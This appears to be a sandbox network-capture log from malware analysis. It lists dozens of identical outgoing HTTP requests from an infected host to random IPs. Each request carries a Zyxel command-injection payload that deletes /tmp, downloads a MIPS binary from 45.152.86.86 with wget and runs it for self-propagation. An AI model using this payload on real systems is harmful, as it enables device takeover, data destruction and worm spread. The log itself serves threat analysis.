                                        Mar 31, 2024 09:21:18.880512953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4471192.168.2.2340352169.83.233.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.880568027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4472192.168.2.235706425.108.140.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.880625963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4473192.168.2.23340044.176.48.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.880676985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4474192.168.2.2343556131.44.87.126443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.880774975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4475192.168.2.2353370221.15.63.30443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.880806923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4476192.168.2.2338200153.54.224.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.880902052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4477192.168.2.2335000136.91.146.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.880940914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4478192.168.2.2346630112.67.157.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.881042004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4479192.168.2.234933035.36.251.197443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.881072998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4480192.168.2.2335816153.179.82.144443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.881160021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4481192.168.2.234498843.69.219.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.881198883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4482192.168.2.2351426212.203.70.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.881280899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4483192.168.2.2345702190.246.67.228443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.881339073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4484192.168.2.2333992186.92.251.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.881396055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4485192.168.2.235729677.81.42.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.881469011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4486192.168.2.2342622115.136.248.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.881509066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4487192.168.2.2354160141.60.205.76443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.881592035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4488192.168.2.2359240140.184.30.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.881652117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4489192.168.2.233962286.21.3.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.881705999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4490192.168.2.2345918117.225.181.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.881782055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4491192.168.2.2351160179.216.56.98443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.881841898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4492192.168.2.235920259.150.235.170443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.881891012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4493192.168.2.236083464.226.148.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.881978989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4494192.168.2.235481040.159.202.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.882009983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4495192.168.2.2348980145.23.82.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.882103920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4496192.168.2.2357522146.105.214.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.882164001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4497192.168.2.234979057.61.146.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.882225037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4498192.168.2.2354072131.108.1.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.882277966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4499192.168.2.2352180145.3.118.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.882354021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4500192.168.2.2346944110.238.140.195443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.882390022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4501192.168.2.234500080.4.196.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.882487059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4502192.168.2.2360932163.38.217.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.882519960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4503192.168.2.2337464209.178.245.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.882596970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4504192.168.2.235726238.246.179.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.882656097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4505192.168.2.2349374165.227.46.230443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.882730007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4506192.168.2.23387488.43.2.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.882798910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4507192.168.2.234652840.149.63.76443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.882843018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4508192.168.2.234959671.151.107.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.882909060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4509192.168.2.233319066.18.244.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.882967949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4510192.168.2.234359018.95.145.170443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.883048058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4511192.168.2.234743691.188.87.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.883079052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4512192.168.2.234792070.160.167.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.883164883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4513192.168.2.2334318142.143.23.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.883213997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4514192.168.2.2346944193.81.148.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.883297920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4515192.168.2.233800894.29.136.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.883331060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4516192.168.2.23430229.169.225.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.883407116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4517192.168.2.2354752191.47.18.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.883434057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4518192.168.2.233349899.154.185.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.883495092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4519192.168.2.2347518213.104.218.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.883558035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4520192.168.2.2353794201.230.209.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.883646965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4521192.168.2.2352768154.143.158.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.883680105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4522192.168.2.2349108190.134.79.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.883749008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4523192.168.2.234234069.209.47.106443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.883795977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4524192.168.2.233482489.208.37.200443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.883851051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4525192.168.2.2347144201.89.15.95443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.883913994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4526192.168.2.2345436106.29.242.0443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.883992910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4527192.168.2.2338494128.221.24.18443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.884025097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4528192.168.2.2350260155.76.120.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.884107113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4529192.168.2.2360756188.237.46.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.884140968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4530192.168.2.2345008134.48.142.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.884226084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4531192.168.2.2352662192.92.240.43443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.884258032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4532192.168.2.2352856196.72.194.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.884303093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4533192.168.2.2338358105.82.183.211443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.884385109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4534192.168.2.233802875.198.122.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.884419918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4535192.168.2.234794642.40.100.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.884491920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4536192.168.2.234581291.28.148.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.884557009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4537192.168.2.2354720189.47.15.245443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:18.884591103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4538192.168.2.235190468.94.68.106443
                                        TimestampBytes transferredDirectionData
